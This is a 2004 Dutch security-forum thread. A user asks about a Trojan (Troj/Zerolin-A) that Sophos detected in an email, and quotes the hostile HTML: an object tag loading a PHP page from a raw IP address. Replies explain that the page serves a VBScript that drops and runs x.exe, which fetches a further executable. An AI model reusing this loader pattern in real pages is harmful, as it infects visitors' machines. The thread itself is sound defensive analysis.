Vreemd <object> in mail = Trojan/Virus - Privacy en beveiliging

dinsdag 18 mei 2004 15:46

Acties:

Topicstarter

Ik zit net me mail te lezen en toen kreeg ik bij het bekijken van een mailtje direct van Sophos de melding dat er een "Troj/Zerolin-A" en daarna ben ik dus gaan kijken wat er in de broncode van de mail stond.

Daar trof ik dit verdachte stukje aan:

code:

1
2
3

<object data="http://65.
110.63.101/pa
ge.php" width="14" height="14">

Nu vraag ik me af of het mogelijk is om dit in leesbare code te krijgen en wat er precies gebeurd. Als ik (een deel hiervan) in google mee zoekt dan doet hij daar weinig mee.

Volgens de Sophos site zou deze trojan een bestand x.exe in de root zetten en deze opstarten. x.exe download/installeerd dan het bestand y.exe ook in je root.

Webhosting van SkyHost.nl: 25 Mb / 1 Gb windows hosting € 4,50 p/m excl.btw!

dinsdag 18 mei 2004 15:56

Acties:

_the_crow_

Rare vogel

Er staat gewoon een verwijzing naar een adres. In hexadecimaal welliswaar.

Ik kan nog niet precies ontdekken wat het doet. blackd wel dus.

[ Voor 33% gewijzigd door _the_crow_ op 18-05-2004 16:05 ]

Schrödingers cat: In this case there are three determinate states the cat could be in: these being Alive, Dead, and Bloody Furious.

dinsdag 18 mei 2004 15:59

Acties:

blackd

Op dat adres is een vbscript geplaatst die verwijst naar een .exe, geinfecteerd met MultiDropper-GP.a (McAfee)
http://vil.nai.com/vil/content/v_100638.htm

Edit: er wordt inderdaad c:\x.exe gedropt die wordt opgestart met een URL naar mstasks.exe als argument.

[ Voor 123% gewijzigd door blackd op 18-05-2004 16:28 ]

9000Wp o/w SolarEdge SE6K - Panasonic 5kW bi-bloc - gasloos sinds 17-7-2023